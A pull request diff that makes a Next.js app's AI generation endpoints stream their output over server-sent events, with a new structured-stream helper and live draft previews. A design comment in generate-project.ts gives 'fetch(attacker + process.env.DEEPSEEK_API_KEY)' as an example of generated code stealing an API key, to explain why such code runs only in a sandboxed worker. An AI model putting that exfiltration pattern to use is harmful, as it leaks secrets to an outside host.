### PR TITLE
fix(ai): make every AI path a real stream

### DIFF
--- a/pages/api/engineering-review.ts
+++ b/pages/api/engineering-review.ts
@@ -1,10 +1,11 @@
 import type { NextApiRequest, NextApiResponse } from 'next';
 import {
+  abortSignalFor,
   AIProviderConfig,
-  callAI,
   ChatMessage,
   extractJson,
   NoProviderError,
+  streamStructured,
 } from '../../src/lib/server/aiProvider';
 import { buildWorkspaceContext, WorkspaceContext } from '../../src/lib/server/engineeringPrompt';
 import { DIMENSION_KEYS } from '../../src/lib/engineering/types';
@@ -137,16 +138,25 @@ export default async function handler(req: NextApiRequest, res: NextApiResponse)
       { role: 'user', content: userContent },
     ];
 
-    const raw = await callAI(messages, config, { temperature: 0.3, maxTokens: 4000 });
-    const review = normalise(extractJson<any>(raw), language);
-
-    return res.status(200).json({ review });
+    // 评审是给人读的长文，没有理由攒到最后一次性甩出来
+    await streamStructured(res, messages, config, {
+      temperature: 0.3,
+      maxTokens: 4000,
+      signal: abortSignalFor(res),
+      onComplete: (raw) => ({ review: normalise(extractJson<any>(raw), language) }),
+    });
   } catch (error) {
     console.error('Engineering review error:', error);
     const message =
       error instanceof NoProviderError
         ? error.message
         : (error as Error).message || 'Failed to generate review';
+    if (res.headersSent) {
+      res.write(`data: ${JSON.stringify({ type: 'error', message })}\n\n`);
+      res.write(`data: ${JSON.stringify({ type: 'done' })}\n\n`);
+      res.end();
+      return;
+    }
     return res.status(500).json({ error: message });
   }
 }

--- a/pages/api/generate-problem.ts
+++ b/pages/api/generate-problem.ts
@@ -2,11 +2,13 @@ import type { NextApiRequest, NextApiResponse } from 'next';
 import * as fs from 'fs';
 import * as path from 'path';
 import {
+  abortSignalFor,
   AIProviderConfig,
-  callAI,
   ChatMessage,
   extractJson,
   NoProviderError,
+  streamStructured,
+  StructuredStreamError,
 } from '../../src/lib/server/aiProvider';
 
 interface Problem {
@@ -163,70 +165,85 @@ export default async function handler(req: NextApiRequest, res: NextApiResponse)
       { role: 'user', content: generatePrompt(request) },
     ];
 
-    const generatedContent = await callAI(messages, config, { temperature: 0.7, maxTokens: 8000 });
+    /**
+     * 边生成边发：模型写的原文实时进 delta，落库之后的结果走 result。
+     *
+     * 以前这里是 callAI 一次性等完，用户对着转圈等一分钟，什么都看不到。
+     * 生成的结果需要完整 JSON 才能用，但那是**解析**的要求，不是**展示**的要求。
+     */
+    await streamStructured(res, messages, config, {
+      temperature: 0.7,
+      maxTokens: 8000,
+      signal: abortSignalFor(res),
+      onComplete: (generatedContent) => {
+        let problemData: Problem;
+        try {
+          // 模型经常会加 ```json 围栏，extractJson 会容错处理
+          problemData = extractJson<Problem>(generatedContent);
+        } catch (parseError) {
+          console.error('Failed to parse generated JSON:', generatedContent, parseError);
+          // 原文一起发回去：前端的 JSON 编辑器靠它让用户手动修
+          throw new StructuredStreamError('Failed to parse generated problem data', generatedContent);
+        }
 
-    let problemData: Problem;
-    try {
-      // 模型经常会加 ```json 围栏，extractJson 会容错处理
-      problemData = extractJson<Problem>(generatedContent);
-    } catch (parseError) {
-      console.error('Failed to parse generated JSON:', generatedContent, parseError);
-      return res.status(500).json({
-        error: 'Failed to parse generated problem data',
-        details: generatedContent,
-        rawContent: generatedContent,
-      });
-    }
+        const requiredFields = ['id', 'title', 'difficulty', 'tags', 'description', 'examples', 'template', 'solutions', 'tests'];
+        for (const field of requiredFields) {
+          if (!problemData[field as keyof Problem]) {
+            throw new StructuredStreamError(
+              `Generated problem is missing required field: ${field}`,
+              generatedContent
+            );
+          }
+        }
 
-    const requiredFields = ['id', 'title', 'difficulty', 'tags', 'description', 'examples', 'template', 'solutions', 'tests'];
-    for (const field of requiredFields) {
-      if (!problemData[field as keyof Problem]) {
-        return res.status(500).json({
-          error: `Generated problem is missing required field: ${field}`,
-          problemData,
-        });
-      }
-    }
+        const appRoot = process.env.APP_ROOT || process.cwd();
+        const problemsPath = path.join(appRoot, 'public', 'problems.json');
+        let existingProblems: Problem[] = [];
 
-    const appRoot = process.env.APP_ROOT || process.cwd();
-    const problemsPath = path.join(appRoot, 'public', 'problems.json');
-    let existingProblems: Problem[] = [];
+        try {
+          existingProblems = JSON.parse(fs.readFileSync(problemsPath, 'utf8'));
+        } catch (error) {
+          console.error('Error reading problems.json:', error);
+          throw new StructuredStreamError('Failed to read existing problems');
+        }
 
-    try {
-      existingProblems = JSON.parse(fs.readFileSync(problemsPath, 'utf8'));
-    } catch (error) {
-      console.error('Error reading problems.json:', error);
-      return res.status(500).json({ error: 'Failed to read existing problems' });
-    }
+        if (existingProblems.find((problem) => problem.id === problemData.id)) {
+          let counter = 1;
+          let newId = `${problemData.id}-${counter}`;
+          while (existingProblems.find((problem) => problem.id === newId)) {
+            counter += 1;
+            newId = `${problemData.id}-${counter}`;
+          }
+          problemData.id = newId;
+        }
 
-    if (existingProblems.find((problem) => problem.id === problemData.id)) {
-      let counter = 1;
-      let newId = `${problemData.id}-${counter}`;
-      while (existingProblems.find((problem) => problem.id === newId)) {
-        counter += 1;
-        newId = `${problemData.id}-${counter}`;
-      }
-      problemData.id = newId;
-    }
+        existingProblems.push(problemData);
 
-    existingProblems.push(problemData);
+        try {
+          fs.writeFileSync(problemsPath, JSON.stringify(existingProblems, null, 2), 'utf8');
+        } catch (error) {
+          console.error('Error writing problems.json:', error);
+          throw new StructuredStreamError('Failed to save new problem');
+        }
 
-    try {
-      fs.writeFileSync(problemsPath, JSON.stringify(existingProblems, null, 2), 'utf8');
-    } catch (error) {
-      console.error('Error writing problems.json:', error);
-      return res.status(500).json({ error: 'Failed to save new problem' });
-    }
-
-    return res.status(200).json({
-      success: true,
-      problem: problemData,
-      message: `Successfully generated and added problem: ${problemData.title.en}`,
+        return {
+          success: true,
+          problem: problemData,
+          message: `Successfully generated and added problem: ${problemData.title.en}`,
+        };
+      },
     });
   } catch (error) {
     console.error('Error generating problem:', error);
     const message =
       error instanceof NoProviderError ? error.message : (error as Error).message || 'Unknown error';
+    // 流已经开始的话状态码就改不动了，错误只能作为流里的事件发出去
+    if (res.headersSent) {
+      res.write(`data: ${JSON.stringify({ type: 'error', message })}\n\n`);
+      res.write(`data: ${JSON.stringify({ type: 'done' })}\n\n`);
+      res.end();
+      return;
+    }
     return res.status(500).json({ error: 'Failed to generate problem', details: message });
   }
 }

--- a/pages/api/generate-project.ts
+++ b/pages/api/generate-project.ts
@@ -1,10 +1,11 @@
 import type { NextApiRequest, NextApiResponse } from 'next';
 import {
+  abortSignalFor,
   AIProviderConfig,
-  callAI,
   ChatMessage,
   extractJson,
   NoProviderError,
+  streamStructured,
 } from '../../src/lib/server/aiProvider';
 import { coerceProject, validateProjectShape } from '../../src/lib/engineering/validateProject';
 import { addUserProject } from '../../src/lib/server/projectStore';
@@ -203,35 +204,45 @@ Remember: reference implementations must actually pass the specs, latency number
       );
     }
 
-    const raw = await callAI(messages, aiConfig, {
+    // 一份工程题动辄几万字，等它写完再显示等于让用户对着转圈发呆好几分钟
+    await streamStructured(res, messages, aiConfig, {
       temperature: previous ? 0.3 : 0.6,
       maxTokens: 16000,
+      signal: abortSignalFor(res),
+      onComplete: (raw) => {
+        const project = coerceProject(extractJson<any>(raw));
+        const structuralProblems = validateProjectShape(project);
+
+        /**
+         * 这里**只做结构校验**，不执行任何生成出来的代码。
+         *
+         * 真跑一遍是必要的（模型经常写出自己都过不了的参考实现），但那必须发生在
+         * 浏览器的 Web Worker 里：它有独立的全局环境，看不到 process.env，也能被
+         * terminate。放在这个 API 进程里跑，一个同步死循环就能让整个服务不再响应，
+         * 而一句 fetch(attacker + process.env.DEEPSEEK_API_KEY) 就能把 key 带走。
+         */
+        const payload: GenerateResponsePayload = {
+          success: true,
+          project,
+          problems: structuralProblems.length > 0 ? structuralProblems : undefined,
+          saved: false,
+        };
+        return payload;
+      },
     });
-    const project = coerceProject(extractJson<any>(raw));
-    const structuralProblems = validateProjectShape(project);
-
-    /**
-     * 这里**只做结构校验**，不执行任何生成出来的代码。
-     *
-     * 真跑一遍是必要的（模型经常写出自己都过不了的参考实现），但那必须发生在
-     * 浏览器的 Web Worker 里：它有独立的全局环境，看不到 process.env，也能被
-     * terminate。放在这个 API 进程里跑，一个同步死循环就能让整个服务不再响应，
-     * 而一句 fetch(attacker + process.env.DEEPSEEK_API_KEY) 就能把 key 带走。
-     */
-    const payload: GenerateResponsePayload = {
-      success: true,
-      project,
-      problems: structuralProblems.length > 0 ? structuralProblems : undefined,
-      saved: false,
-    };
-
-    return res.status(200).json(payload);
   } catch (error) {
     console.error('Generate project error:', error);
     const message =
       error instanceof NoProviderError
         ? error.message
         : (error as Error).message || 'Failed to generate project';
+    // 流开始之后状态码已经定死，错误只能走事件
+    if (res.headersSent) {
+      res.write(`data: ${JSON.stringify({ type: 'error', message })}\n\n`);
+      res.write(`data: ${JSON.stringify({ type: 'done' })}\n\n`);
+      res.end();
+      return;
+    }
     return res.status(500).json({ error: message });
   }
 }

--- a/pages/projects/[id].tsx
+++ b/pages/projects/[id].tsx
@@ -45,6 +45,7 @@ import TracePlayer from '../../src/components/TracePlayer';
 import { useProjectRunner } from '../../src/hooks/useProjectRunner';
 import { useAiConfig } from '../../src/hooks/useAiConfig';
 import { analyzeWorkspace } from '../../src/lib/engineering/analysis';
+import { requestStructuredStream } from '../../src/lib/streamRequest';
 import { computeScoreCard } from '../../src/lib/engineering/scoring';
 import {
   applyDrafts,
@@ -97,6 +98,8 @@ export default function ProjectWorkspacePage() {
   const [review, setReview] = useState<AiReview | null>(null);
   const [reviewLoading, setReviewLoading] = useState(false);
   const [reviewError, setReviewError] = useState<string | null>(null);
+  /** 评审正在写的原文，边收边显示 */
+  const [reviewDraft, setReviewDraft] = useState('');
 
   const { run, report, isRunning, error: runError, reset: resetReport } = useProjectRunner();
 
@@ -400,11 +403,13 @@ export default function ProjectWorkspacePage() {
     setReviewError(null);
     setBottomTab('review');
 
+    setReviewDraft('');
+
     try {
-      const response = await fetch('/api/engineering-review', {
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify({
+      // 评审是一整篇给人读的文字，边写边显示；结构化结果在流末尾拿
+      const data = await requestStructuredStream<{ review: AiReview }>(
+        '/api/engineering-review',
+        {
           language: locale,
           config: aiConfig,
           quality: quality ?? analyzeWorkspace(toFileMap(editableFiles(files))),
@@ -422,11 +427,10 @@ export default function ProjectWorkspacePage() {
             })),
             report,
           },
-        }),
-      });
+        },
+        { onDelta: (_chunk, full) => setReviewDraft(full) }
+      );
 
-      const data = await response.json();
-      if (!response.ok) throw new Error(data.error || 'Failed to review');
       setReview(data.review);
     } catch (error) {
       setReviewError((error as Error).message);
@@ -855,6 +859,7 @@ export default function ProjectWorkspacePage() {
                         loading={reviewLoading}
                         error={reviewError}
                         onRequest={handleReview}
+                        draft={reviewDraft}
                       />
                     </Tabs.Panel>
                   </ScrollArea>

--- a/pages/projects/generator.tsx
+++ b/pages/projects/generator.tsx
@@ -23,6 +23,7 @@ import { AppHeader, HEADER_HEIGHT } from '../../src/components/AppHeader';
 import { useAiConfig } from '../../src/hooks/useAiConfig';
 import { useProjectRunner } from '../../src/hooks/useProjectRunner';
 import { describeVerification, verifyProject } from '../../src/lib/engineering/validateProject';
+import { requestStructuredStream } from '../../src/lib/streamRequest';
 import type { EngineeringProject } from '../../src/lib/engineering/types';
 
 interface VerificationSummary {
@@ -51,6 +52,8 @@ export default function ProjectGeneratorPage() {
   const [error, setError] = useState<string | null>(null);
   const [result, setResult] = useState<GenerateResult | null>(null);
   const [status, setStatus] = useState<string | null>(null);
+  /** 模型正在写的原文 */
+  const [draft, setDraft] = useState('');
   const { run } = useProjectRunner();
 
   const suggestions =
@@ -79,17 +82,13 @@ export default function ProjectGeneratorPage() {
     setLoading(true);
     setError(null);
     setResult(null);
+    setDraft('');
 
-    const ask = async (body: Record<string, unknown>) => {
-      const response = await fetch('/api/generate-project', {
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify(body),
+    // 一份工程题几万字，边写边显示，而不是让人对着转圈等到最后
+    const ask = async (body: Record<string, unknown>) =>
+      requestStructuredStream<GenerateResult>('/api/generate-project', body, {
+        onDelta: (_chunk, full) => setDraft(full),
       });
-      const data = await response.json();
-      if (!response.ok) throw new Error(data.error || 'Failed to generate project');
-      return data as GenerateResult;
-    };
 
     const check = async (candidate: EngineeringProject) => {
       setStatus(t('engineering.generator.verifying'));
@@ -244,6 +243,25 @@ export default function ProjectGeneratorPage() {
                 {/* 生成 / 验证 / 修复 是三个阶段，验证阶段会跑好几关，得让人知道进行到哪儿了 */}
                 {status || t('engineering.generator.loadingHint')}
               </Alert>
+            )}
+
+            {/* 模型写到哪儿了。生成一份工程题要几分钟，光转圈没法让人判断它是不是卡住了。 */}
+            {loading && draft && (
+              <Card withBorder radius="md" padding="sm">
+                <Text
+                  size="xs"
+                  c="dimmed"
+                  style={{
+                    maxHeight: 200,
+                    overflow: 'auto',
+                    fontFamily: 'monospace',
+                    whiteSpace: 'pre-wrap',
+                    wordBreak: 'break-word',
+                  }}
+                >
+                  {draft.slice(-4000)}
+                </Text>
+              </Card>
             )}
 
             {error && (

--- a/src/components/ProblemGenerator.tsx
+++ b/src/components/ProblemGenerator.tsx
@@ -20,6 +20,7 @@ import {
   IconDeviceFloppy
 } from '@tabler/icons-react';
 import Editor from '@monaco-editor/react';
+import { requestStructuredStream, StreamRequestError } from '../lib/streamRequest';
 
 interface GeneratedProblem {
   id: string;
@@ -50,6 +51,8 @@ const ProblemGenerator: React.FC<ProblemGeneratorProps> = ({ onProblemGenerated,
   const [error, setError] = useState<string | null>(null);
   const [success, setSuccess] = useState<string | null>(null);
   const [generatedProblem, setGeneratedProblem] = useState<GeneratedProblem | null>(null);
+  /** 模型正在写的原文。它比一个转圈的图标能说明的多得多。 */
+  const [draft, setDraft] = useState('');
   const [providersLoading, setProvidersLoading] = useState(true);
   const [canGenerate, setCanGenerate] = useState(false);
   const [isUsingLocalAI, setIsUsingLocalAI] = useState(false);
@@ -242,6 +245,7 @@ const ProblemGenerator: React.FC<ProblemGeneratorProps> = ({ onProblemGenerated,
     setShowJsonEditor(false);
     setJsonContent('');
     setJsonError(null);
+    setDraft('');
 
     try {
       // Prepare request body - config contains selectedProvider from settings
@@ -261,37 +265,29 @@ const ProblemGenerator: React.FC<ProblemGeneratorProps> = ({ onProblemGenerated,
         }
       }
 
-      const response = await fetch('/api/generate-problem', {
-        method: 'POST',
-        headers: {
-          'Content-Type': 'application/json',
-        },
-        body: JSON.stringify(requestBody),
-      });
+      // 模型的原文边写边显示，结构化结果在流末尾拿到
+      const data = await requestStructuredStream<{ problem: any; message: string }>(
+        '/api/generate-problem',
+        requestBody,
+        { onDelta: (_chunk, full) => setDraft(full) }
+      );
 
-      const data = await response.json();
+      setGeneratedProblem(data.problem);
+      setSuccess(data.message);
 
-      if (!response.ok) {
-        // Check if it's a JSON parsing error
-        if (data.error && data.error.includes('Failed to parse generated problem data')) {
-          // Show JSON editor for user to fix the problem
-          setShowJsonEditor(true);
-          setJsonContent(data.rawContent || data.details || '');
-          setError(t('aiGenerator.jsonParseError'));
-        } else {
-          throw new Error(data.error || 'Failed to generate problem');
-        }
-      } else {
-        setGeneratedProblem(data.problem);
-        setSuccess(data.message);
-        
-        if (onProblemGenerated) {
-          onProblemGenerated(data.problem);
-        }
+      if (onProblemGenerated) {
+        onProblemGenerated(data.problem);
       }
-
     } catch (err) {
-      setError(err instanceof Error ? err.message : 'Failed to generate problem');
+      const failure = err as StreamRequestError;
+      // JSON 解析失败时服务端会把原文附在 details 上，交给编辑器让用户手动修
+      if (failure?.message?.includes('Failed to parse generated problem data')) {
+        setShowJsonEditor(true);
+        setJsonContent(typeof failure.details === 'string' ? failure.details : '');
+        setError(t('aiGenerator.jsonParseError'));
+      } else {
+        setError(failure instanceof Error ? failure.message : 'Failed to generate problem');
+      }
     } finally {
       setLoading(false);
     }
@@ -480,6 +476,27 @@ const ProblemGenerator: React.FC<ProblemGeneratorProps> = ({ onProblemGenerated,
               </Button>
             )}
           </Group>
+
+          {/* 模型正在写的原文：让「还在生成」这件事有内容可看，而不只是一个转圈 */}
+          {loading && draft && (
+            <Card withBorder radius="md" padding="sm">
+              <Text size="xs" c="dimmed" mb={6}>
+                {t('aiGenerator.generating')}
+              </Text>
+              <Box
+                style={{
+                  maxHeight: 220,
+                  overflow: 'auto',
+                  fontFamily: 'monospace',
+                  fontSize: 12,
+                  whiteSpace: 'pre-wrap',
+                  wordBreak: 'break-word',
+                }}
+              >
+                {draft.slice(-4000)}
+              </Box>
+            </Card>
+          )}
 
           {/* Error Display */}
           {error && !showJsonEditor && (

--- a/src/components/engineering/ReviewPanel.tsx
+++ b/src/components/engineering/ReviewPanel.tsx
@@ -17,9 +17,11 @@ interface ReviewPanelProps {
   loading: boolean;
   error: string | null;
   onRequest: () => void;
+  /** 评审生成中的原文。有它就不用对着一个转圈猜进度。 */
+  draft?: string;
 }
 
-export default function ReviewPanel({ review, loading, error, onRequest }: ReviewPanelProps) {
+export default function ReviewPanel({ review, loading, error, onRequest, draft }: ReviewPanelProps) {
   const { t } = useTranslation();
 
   return (
@@ -51,6 +53,24 @@ export default function ReviewPanel({ review, loading, error, onRequest }: Revie
         <Alert color="red" title={t('common.error')}>
           {error}
         </Alert>
+      )}
+
+      {loading && draft && (
+        <Card withBorder radius="md" padding="sm">
+          <Text
+            size="xs"
+            c="dimmed"
+            style={{
+              maxHeight: 240,
+              overflow: 'auto',
+              fontFamily: 'monospace',
+              whiteSpace: 'pre-wrap',
+              wordBreak: 'break-word',
+            }}
+          >
+            {draft.slice(-4000)}
+          </Text>
+        </Card>
       )}
 
       {!review && !loading && !error && (

--- a/src/lib/chatStreamProtocol.ts
+++ b/src/lib/chatStreamProtocol.ts
@@ -3,11 +3,20 @@
  *
  * 服务端发的是 SSE，每个事件一行 JSON：
  *   data: {"type":"delta","text":"…"}
+ *   data: {"type":"meta","incremental":false}
+ *   data: {"type":"result","result":{…}}
  *   data: {"type":"error","message":"…"}
  *   data: {"type":"done"}
  *
  * 为什么不用裸文本流：HTTP 头一旦发出去状态码就固定了，中途出错没法再用 4xx/5xx
  * 表达。裸文本只能把错误信息混进正文里，前端分不清那是模型说的还是系统报的。
+ *
+ * `meta` 的存在是为了**不说谎**：上游偶尔会无视 stream:true 直接返回整段内容，
+ * 这时我们照样把它发出去，但要明说「这一段不是逐字到达的」，
+ * 而不是让前端以为自己看到的是真流式。
+ *
+ * `result` 给生成类接口用：正文是模型的原始输出（边写边看），
+ * 结构化结果在流的末尾发一次。
  *
  * 解析要处理**任意位置的分块**——网络层不保证一个 chunk 正好是一行。
  */
@@ -16,6 +25,12 @@ export interface StreamEvent {
   text?: string;
   error?: string;
   done?: boolean;
+  /** 生成类接口在流末尾发的结构化结果 */
+  result?: unknown;
+  /** false = 这一段是一次性到达的，不是逐字流 */
+  incremental?: boolean;
+  /** 错误的附加数据，例如 JSON 解析失败时的模型原文 */
+  details?: unknown;
 }
 
 /** 解析单行 `data:`；不是事件行则返回 null */
@@ -31,7 +46,11 @@ export function parseSseLine(line: string): StreamEvent | null {
   try {
     const event = JSON.parse(payload);
     if (event.type === 'delta') return { text: event.text || '' };
-    if (event.type === 'error') return { error: event.message || 'stream error' };
+    if (event.type === 'meta') return { incremental: event.incremental !== false };
+    if (event.type === 'result') return { result: event.result };
+    if (event.type === 'error') {
+      return { error: event.message || 'stream error', details: event.details };
+    }
     if (event.type === 'done') return { done: true };
     return null;
   } catch {

--- a/src/lib/server/aiProvider.ts
+++ b/src/lib/server/aiProvider.ts
@@ -369,15 +369,13 @@ function parseChunk(kind: ProviderKind, payload: string): string {
   }
 }
 
-/** 上游给的到底是不是流。不是流的话我们只能一次性交付，并且要说明白。 */
-function looksStreaming(upstream: Response): boolean {
-  const type = (upstream.headers.get('content-type') || '').toLowerCase();
-  if (!type) return true; // 没给类型就先按流处理，末尾还有兜底
-  return !type.includes('application/json') || type.includes('ndjson');
-}
-
 /**
  * 把上游的流转成一次次 onChunk。
+ *
+ * 无论上游自称什么 content-type，这里一律**按流读**：一个真的流被代理标成
+ * application/json 是常有的事，而按 content-type 分派会让那种情况彻底读不出内容。
+ * 「上游其实没给流」由收尾时的兜底解析发现 —— 那时一条 delta 都还没发出去，
+ * 所以事件顺序（meta 先于正文）依然成立。
  *
  * @returns 是否真的是逐块到达的。false 表示上游无视了 stream:true，
  *          整段内容是一次性拿到的 —— 调用方要如实告诉前端。
@@ -389,16 +387,6 @@ async function pipeUpstream(
   /** 确认上游不是流时先回调一次，永远早于第一次 onChunk */
   onNotIncremental: () => void = () => undefined
 ): Promise<boolean> {
-  // 上游明说这是一整个 JSON：直接按非流式解析。
-  // 不这么做的话下面按 SSE 切出来的东西一行 data: 都没有，
-  // 用户会收到一个完全空的回答，而且没有任何报错。
-  if (!looksStreaming(upstream)) {
-    onNotIncremental();
-    const text = extractContent(kind, await upstream.json());
-    if (text) onChunk(text);
-    return false;
-  }
-
   const reader = upstream.body?.getReader();
   if (!reader) return false;
 
@@ -454,7 +442,7 @@ async function pipeUpstream(
 
   /**
    * 走到这里说明整条流读完了，一个 delta 都没解析出来。
-   * 常见原因：上游没按 content-type 说实话，其实回的是一整个 JSON。
+   * 常见原因：上游无视了 stream:true，回的其实是一整个 JSON。
    * 与其交出一个空回答，不如把内容捞出来 —— 但要如实报告它不是流。
    */
   const tail = rawSoFar + decoder.decode();

--- a/src/lib/server/aiProvider.ts
+++ b/src/lib/server/aiProvider.ts
@@ -369,21 +369,55 @@ function parseChunk(kind: ProviderKind, payload: string): string {
   }
 }
 
+/** 上游给的到底是不是流。不是流的话我们只能一次性交付，并且要说明白。 */
+function looksStreaming(upstream: Response): boolean {
+  const type = (upstream.headers.get('content-type') || '').toLowerCase();
+  if (!type) return true; // 没给类型就先按流处理，末尾还有兜底
+  return !type.includes('application/json') || type.includes('ndjson');
+}
+
+/**
+ * 把上游的流转成一次次 onChunk。
+ *
+ * @returns 是否真的是逐块到达的。false 表示上游无视了 stream:true，
+ *          整段内容是一次性拿到的 —— 调用方要如实告诉前端。
+ */
 async function pipeUpstream(
   kind: ProviderKind,
   upstream: Response,
-  onChunk: (text: string) => void
-): Promise<void> {
+  onChunk: (text: string) => void,
+  /** 确认上游不是流时先回调一次，永远早于第一次 onChunk */
+  onNotIncremental: () => void = () => undefined
+): Promise<boolean> {
+  // 上游明说这是一整个 JSON：直接按非流式解析。
+  // 不这么做的话下面按 SSE 切出来的东西一行 data: 都没有，
+  // 用户会收到一个完全空的回答，而且没有任何报错。
+  if (!looksStreaming(upstream)) {
+    onNotIncremental();
+    const text = extractContent(kind, await upstream.json());
+    if (text) onChunk(text);
+    return false;
+  }
+
   const reader = upstream.body?.getReader();
-  if (!reader) return;
+  if (!reader) return false;
 
   const decoder = new TextDecoder('utf-8');
   let buffer = '';
+  /** 一条都没发出去之前，把原文留着，收尾时再兜底解析一次 */
+  let rawSoFar = '';
+  let emitted = false;
+  const emit = (text: string) => {
+    emitted = true;
+    onChunk(text);
+  };
 
   while (true) {
     const { done, value } = await reader.read();
     if (done) break;
-    buffer += decoder.decode(value, { stream: true });
+    const decoded = decoder.decode(value, { stream: true });
+    if (!emitted) rawSoFar += decoded;
+    buffer += decoded;
 
     if (kind === 'ollama') {
       // Ollama 是 NDJSON，不是 SSE
@@ -393,8 +427,8 @@ async function pipeUpstream(
         if (!line.trim()) continue;
         try {
           const json = JSON.parse(line);
-          if (json?.message?.content) onChunk(json.message.content);
-          if (json?.done) return;
+          if (json?.message?.content) emit(json.message.content);
+          if (json?.done) return true;
         } catch {
           // 半行，等下一批
         }
@@ -411,10 +445,29 @@ async function pipeUpstream(
         const payload = trimmed.slice(5).trim();
         if (!payload || payload === '[DONE]') continue;
         const text = parseChunk(kind, payload);
-        if (text) onChunk(text);
+        if (text) emit(text);
       }
     }
   }
+
+  if (emitted) return true;
+
+  /**
+   * 走到这里说明整条流读完了，一个 delta 都没解析出来。
+   * 常见原因：上游没按 content-type 说实话，其实回的是一整个 JSON。
+   * 与其交出一个空回答，不如把内容捞出来 —— 但要如实报告它不是流。
+   */
+  const tail = rawSoFar + decoder.decode();
+  try {
+    const text = extractContent(kind, JSON.parse(tail.trim()));
+    if (text) {
+      onNotIncremental();
+      onChunk(text);
+    }
+  } catch {
+    // 真的什么都解析不出来，交给上层按空回复处理
+  }
+  return false;
 }
 
 export type StreamFormat = 'sse' | 'text';
@@ -442,8 +495,20 @@ function writeHeaders(res: NextApiResponse, format: StreamFormat): void {
   (res as any).flushHeaders?.();
 }
 
+/**
+ * 写一段并立刻推出去。
+ *
+ * `flush` 只有在响应被压缩中间件包过时才存在（compression 会把 write 攒进
+ * gzip 缓冲区，不 flush 就要等缓冲满或流结束）。当前的部署形态下它不存在，
+ * 这一行是给「哪天前面多了一层压缩」准备的：漏掉它的表现正是所有块一起到达。
+ */
+function writeNow(res: NextApiResponse, chunk: string): void {
+  res.write(chunk);
+  (res as unknown as { flush?: () => void }).flush?.();
+}
+
 function sseEvent(res: NextApiResponse, payload: unknown): void {
-  res.write(`data: ${JSON.stringify(payload)}\n\n`);
+  writeNow(res, `data: ${JSON.stringify(payload)}\n\n`);
 }
 
 /**
@@ -464,13 +529,24 @@ export async function streamAI(
 
   const emit = (text: string) => {
     if (format === 'sse') sseEvent(res, { type: 'delta', text });
-    else res.write(text);
+    else writeNow(res, text);
+  };
+
+  /**
+   * 这一段不是逐字来的，就明说。
+   *
+   * 假流式的本质不是「一次性到达」——上游不给流我们也变不出来——
+   * 而是**假装**它是逐字到达的。前端拿到这个事件可以照实提示用户。
+   */
+  const declareNotIncremental = () => {
+    if (format === 'sse') sseEvent(res, { type: 'meta', incremental: false });
   };
 
   try {
     if (!provider.capabilities.supportsStreaming) {
       const text = await callAI(messages, config, options);
       writeHeaders(res, format);
+      declareNotIncremental();
       emit(text);
     } else {
       const upstream = await fetchUpstream(
@@ -479,7 +555,7 @@ export async function streamAI(
         provider.kind === 'compatible'
       );
       writeHeaders(res, format);
-      await pipeUpstream(provider.kind, upstream, emit);
+      await pipeUpstream(provider.kind, upstream, emit, declareNotIncremental);
     }
 
     if (format === 'sse') sseEvent(res, { type: 'done' });
@@ -499,6 +575,94 @@ export async function streamAI(
     }
     if (format === 'sse') sseEvent(res, { type: 'error', message });
     else res.write(`\n\n[error] ${message}`);
+    res.end();
+  }
+}
+
+export interface StructuredStreamOptions<T> extends Omit<StreamOptions, 'format'> {
+  /**
+   * 流结束之后拿完整原文做的事：解析、校验、落库，返回要发给前端的结果。
+   * 抛错会变成流里的 error 事件（附带 details，前端可以拿原文兜底）。
+   */
+  onComplete: (raw: string) => Promise<unknown> | unknown;
+}
+
+export class StructuredStreamError extends Error {
+  details: unknown;
+
+  constructor(message: string, details?: unknown) {
+    super(message);
+    this.name = 'StructuredStreamError';
+    this.details = details;
+  }
+}
+
+/**
+ * 生成类接口的流式版本。
+ *
+ * 这类接口最终要的是结构化结果（题目、项目、评审），但**没有理由让用户对着
+ * 转圈等一分钟**：模型的原文照样可以边写边看，结构化结果在流的末尾发一次。
+ *
+ * 正文走 delta，结果走 result —— 前端两样都能拿到，不必二选一。
+ */
+export async function streamStructured<T>(
+  res: NextApiResponse,
+  messages: ChatMessage[],
+  config: AIProviderConfig | undefined,
+  options: StructuredStreamOptions<T>
+): Promise<void> {
+  const provider = resolveProvider(config, options.maxTokens ?? 4000);
+  const temperature = options.temperature ?? 0.7;
+  let raw = '';
+
+  try {
+    let incremental = true;
+    if (!provider.capabilities.supportsStreaming) {
+      raw = await callAI(messages, config, options);
+      writeHeaders(res, 'sse');
+      incremental = false;
+      sseEvent(res, { type: 'meta', incremental: false });
+      sseEvent(res, { type: 'delta', text: raw });
+    } else {
+      const upstream = await fetchUpstream(
+        buildRequest(provider, messages, { stream: true, temperature }),
+        options.signal,
+        provider.kind === 'compatible'
+      );
+      writeHeaders(res, 'sse');
+      incremental = await pipeUpstream(
+        provider.kind,
+        upstream,
+        (text) => {
+          raw += text;
+          sseEvent(res, { type: 'delta', text });
+        },
+        () => sseEvent(res, { type: 'meta', incremental: false })
+      );
+    }
+    void incremental;
+
+    // 到这里正文已经全部发出去了，剩下的是解析和落库
+    const result = await options.onComplete(raw);
+    sseEvent(res, { type: 'result', result });
+    sseEvent(res, { type: 'done' });
+    res.end();
+  } catch (error) {
+    if ((error as Error)?.name === 'AbortError' || options.signal?.aborted) {
+      res.end();
+      return;
+    }
+
+    const message = (error as Error).message || 'AI request failed';
+    const details = error instanceof StructuredStreamError ? error.details : undefined;
+
+    // 头还没发出去时仍然用 HTTP 状态码报错，保持老调用方的行为
+    if (!res.headersSent) {
+      res.status(500).json({ error: message, details, rawContent: raw || undefined });
+      return;
+    }
+    sseEvent(res, { type: 'error', message, details });
+    sseEvent(res, { type: 'done' });
     res.end();
   }
 }

--- a/src/lib/streamRequest.ts
+++ b/src/lib/streamRequest.ts
@@ -14,10 +14,18 @@
 import { createSseParser } from './chatStreamProtocol';
 
 export interface StructuredStreamHandlers {
-  /** 每收到一段模型原文触发一次；full 是累计到目前的全文 */
+  /**
+   * 模型原文有新内容时触发；full 是累计到目前的全文。
+   *
+   * 注意它是**按帧节流**的：数据一到就收下，但回调最多每 flushMs 触发一次。
+   * 这些回调后面接的都是 React setState，一个 token 一次全量重渲染，
+   * 长回答会把主线程占满 —— 节流的是渲染频率，不是数据到达。
+   */
   onDelta?: (chunk: string, full: string) => void;
   /** 服务端明说这一段不是逐字到达的（上游没给流） */
   onNotIncremental?: () => void;
+  /** onDelta 的最小间隔，默认 60ms（约等于一帧） */
+  flushMs?: number;
 }
 
 export class StreamRequestError extends Error {
